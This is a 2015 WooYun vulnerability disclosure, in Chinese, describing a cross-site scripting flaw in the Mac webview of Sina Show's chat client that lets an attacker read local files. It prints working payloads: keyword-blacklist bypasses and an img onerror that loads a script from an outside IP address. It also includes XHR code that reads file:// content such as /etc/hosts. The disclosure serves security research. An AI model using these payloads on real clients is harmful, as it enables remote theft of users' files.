当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148359

漏洞标题:新浪Show视频聊天客户端(Mac版)设计缺陷可远程读取用户本地文件

相关厂商:新浪

漏洞作者: 数据流

提交时间:2015-10-21 15:47

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-24: 厂商已经确认,细节仅向厂商公开
2015-10-27: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

Mac的客户端还是短板,很多厂商不重视,都以windows为重。。。

详细说明:

新浪show Mac版(最新)
进了一个没人的聊天室

QQ20151021-1@2x.png


看到这样的界面与文字就知道是用webview
直接测试<iframe> 居然直接在聊天界面打印出html了。

QQ20151021-2@2x.png


本来想看看location.href的 没想到却提示非法字符

QQ20151018-1@2x.png


“location.href” 这就是黑名单关键字

<img src=x onerror="var x=location;document.write(x.href)">


只要拆分location和href就能绕过了

QQ20151018-3@2x.png

是file://域
navigator.userAgent 是safari

QQ20151021-3@2x.png


基于safari的特性,在file://下时可以跨域
但测试时候发现"/"和域名是非法字符,但可以用ascii字符来绕过,而且也没对ip地址进行检测

<img src=x onerror=document.body.appendChild(document.createElement('script')).src="http:\x2f\x2f23.244.125.233\x2f1.js">


直接加载外部js更方便

xhr = new XMLHttpRequest();
xhr.onreadystatechange = function (){
if (xhr.readyState == 4) {
prompt(xhr.responseText);
} };
xhr.open("GET",
"http://wooyun.org");
xhr.send();


QQ20151021-4@2x.png


但是并不能读到safari已登陆的状态,但可以读取file://上的数据

漏洞证明:

/etc/hosts

QQ20151020-4@2x.png


用户本机上的部分文件可被远程窃取

修复方案:

版权声明:转载请注明来源 数据流@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-10-24 10:21

厂商回复:

感谢关注新浪安全,将通知第三方进行问题修复。

最新状态:

暂无